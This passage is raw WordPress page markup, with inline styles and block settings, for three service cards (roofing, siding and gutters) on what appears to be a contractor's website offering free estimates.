undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-0b9e5611-3349-4218-a906-00718b0363e1 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-0b9e5611-3349-4218-a906-00718b0363e1\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"a975dbd0-6829-41b9-b61d-4e9684d440f4\"} -->\n<style type=\"text/css\"> .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-a975dbd0-6829-41b9-b61d-4e9684d440f4 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Never worry again with a  new roof from Dunrite. Call for free estimate.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-c5d318cb-a5d6-4a1e-9510-c3fb3dd1fdac\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"c7d7caa5-ceee-43f3-a4c0-2e76984590ee\"} -->\n<style type=\"text/css\"> .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-c7d7caa5-ceee-43f3-a4c0-2e76984590ee skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Siding</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Either vinyl shakes or custom metal trim contact Dunrite for a free estimate..</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":2,\"blockId\":\"07e40f2e-6c43-4426-9c51-32b198680ee5\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-07e40f2e-6c43-4426-9c51-32b198680ee5 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 2px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-07e40f2e-6c43-4426-9c51-32b198680ee5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":29,\"title\":\"services-img3\",\"filename\":\"services-img3.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img3/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img3\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"1df582acb1\",\"delete\":\"75ddbb8dd1\",\"edit\":\"b8f84e66c7\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=29u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2302,\"filesizeHumanReadable\":\"2 KB\",\"context\":\"\",\"height\":67,\"width\":59,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\",\"height\":67,\"width\":59,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":59,\"resshowPrefix\":false,\"counterId\":\"4b500be0-2fa9-4b01-a853-bfde34656538\"} -->\n<style type=\"text/css\"> .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-image-content img {\n width: 59px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-4b500be0-2fa9-4b01-a853-bfde34656538 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img3.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Gutters</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">call today for a free estimate on new seamless aluminum gutters by Dunrite..</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/painting/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"44c2922d-ade1-4071-bb8d-5dc07c7e63b3\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-44c2922d-ade1-4071-bb8d-5dc07c7e63b3 